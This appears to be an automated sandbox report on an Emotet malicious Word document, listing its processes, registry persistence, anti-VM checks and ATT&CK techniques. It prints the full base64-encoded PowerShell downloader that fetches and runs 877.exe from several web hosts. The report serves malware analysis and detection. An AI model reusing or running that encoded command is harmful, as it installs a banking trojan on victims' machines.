9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1

Analysis

max time kernel
149s
max time network
144s
resource
win10

Sharing

Copy URL

Twitter E-mail

General

Target

Docs_8284e996aea8e5075256c03a93eaa6df.10
Sample

191011-wdamp968r2
SHA256

9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1

Score

N/A

Malware Config

Signatures

Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx

Drops Office document 4 IoCs

Processes:

WINWORD.EXE

at	description	ioc	Process
19953	File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm	WINWORD.EXE
20094	File created	C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	WINWORD.EXE
26000	File opened for modification	C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.10.doc	WINWORD.EXE
27891	File created	C:\Users\Admin\AppData\Local\Temp\~$cs_8284e996aea8e5075256c03a93eaa6df.10.doc	WINWORD.EXE

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

SppExtComObj.exepowershell.exe877.exe

at	description	Process	procid_target
22594	PID 3720 wrote to memory of 3864	SppExtComObj.exe	42
114859	PID 2484 wrote to memory of 3752	powershell.exe	48
137656	PID 3752 wrote to memory of 672	877.exe	49

Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
25594	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	WINWORD.EXE
25594	Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	WINWORD.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
25594	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
25594	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
25594	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
25594	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
25594	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

at	description	ioc	Process
25594	Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
25594	Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

at	description	Process
77313	Token: SeDebugPrivilege	powershell.exe

Suspicious behavior: EnumeratesProcesses

Modifies registry class 1 TTPs 44 IoCs

persistence

Modify Registry

T1112

Processes:

877.exe877.exe

at	description	ioc	Process
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	877.exe
126625	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	877.exe
126625	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0"	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open	877.exe
126625	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print	877.exe
126625	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto	877.exe
126625	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	877.exe
126625	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	877.exe
126625	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
126625	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	877.exe
126625	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
134297	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	877.exe
134297	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	877.exe
134547	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	877.exe
134547	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1"	877.exe
138078	Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew	877.exe
138078	Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile	877.exe

Emotet Sync 1 IoCs

trojan banker

Processes:

877.exe

description	ioc	Process
Event created	Global\E145925EC	877.exe

Suspicious behavior: EmotetMutantsSpam
emotet family
family

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.10.doc" /o ""
1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:992

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:3864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAOQAwADUAMAAyADAAYwA5ADAAYwA1AD0AJwBiADgAMQAzADcANgAzADQAMwA5AGMAMABjACcAOwAkAGIAeAAyADQANwAwADQANgAwADUAMgAgAD0AIAAnADgANwA3ACcAOwAkAHgAOQAwADEAeAA0ADMAMQAyADMANQAzAD0AJwB4AGIAYwA5ADEAMgAyADAANAAzAHgAJwA7ACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgB4ADIANAA3ADAANAA2ADAANQAyACsAJwAuAGUAeABlACcAOwAkAHgAMwBjAGIAMAA0ADIAOQA1ADcANgA4AD0AJwBjAHgAMQB4AHgAeAB4ADYAYgA4ADUAJwA7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAYgBDAGwAaQBFAE4AVAA7ACQAYgBjADMAMwAwADEAOAAwAGMAMAA4AD0AJwBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBpAGwAdgBlAHIAYQBuAHQALgBjAG8AbQAvAHQAZQBzAHQALwBkAHYAcgA5AC8AKgBoAHQAdABwADoALwAvAGYAaQByAHMAdABtAG4AZAAuAGMAbwBtAC8AdwBwAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAawA5ADYAMAAvACoAaAB0AHQAcAA6AC8ALwBjAGkAdAB5AGwAYQBuAGQAZwBvAHYAYQBwAC4AbgBlAHQALwA4AGQAcQBzADUAZgB2AC8ANgBKAC8AKgBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGIAYQBzAC8AKgBoAHQAdABwADoALwAvAGYAYQB0AHQAbwByAGkAYQBpAHAAbwBuAHQAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbwAxAHcAaQBFAHEAUABmAE4ALwAnAC4AIgBTAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAeAAzADMANgBjADUAMAAxADAAYgAyADcAPQAnAGIAOQA2ADcAYgAxAHgAMgAwADEAMgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAAzADcANQAwADAAOAAxADAAMAA1ADcAYwAgAGkAbgAgACQAYgBjADMAMwAwADEAOAAwAGMAMAA4ACkAewB0AHIAeQB7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAAuACIAZABPAFcAbgBMAGAATwBhAGQAZgBgAEkATABFACIAKAAkAHgAMwA3ADUAMAAwADgAMQAwADAANQA3AGMALAAgACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJABiADYAMgA2ADgAMQB4AGMAMwBjAHgANAA9ACcAeABiADAAMAA1AGIAMAA1ADAANgB4ADMANQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAGIANAA4ADAANwA5ADAANwAwAGIAMQA5ADIAKQAuACIATABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAyADcAOQAxADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AEEAYABSAHQAIgAoACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJAB4ADIAYgAwADcAOAA3ADcAOAA0ADAAMAA9ACcAYgAxADAAMgAwADEAMAAxADAAMAA2ADAAJwA7AGIAcgBlAGEAawA7ACQAYgAyADAAOAAyADAAeAAwADIAYwAzADMANQA9ACcAeAAxAHgAMQAxAHgAMAA0AGMANQA4ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGIAYwA1ADkAMAAwAGIAMwA4ADEAOAAyADcAPQAnAGMAMAA3ADkAOAAwADkAOQA2ADgANgA4ADkAJwA=
1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Users\Admin\877.exe
"C:\Users\Admin\877.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:3752

C:\Users\Admin\877.exe
--406b0556
1⤵
- Modifies registry class
- Emotet Sync
PID:672

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/672-6-0x0000000000400000-0x0000000000481000-memory.dmp

Filesize
516KB

Download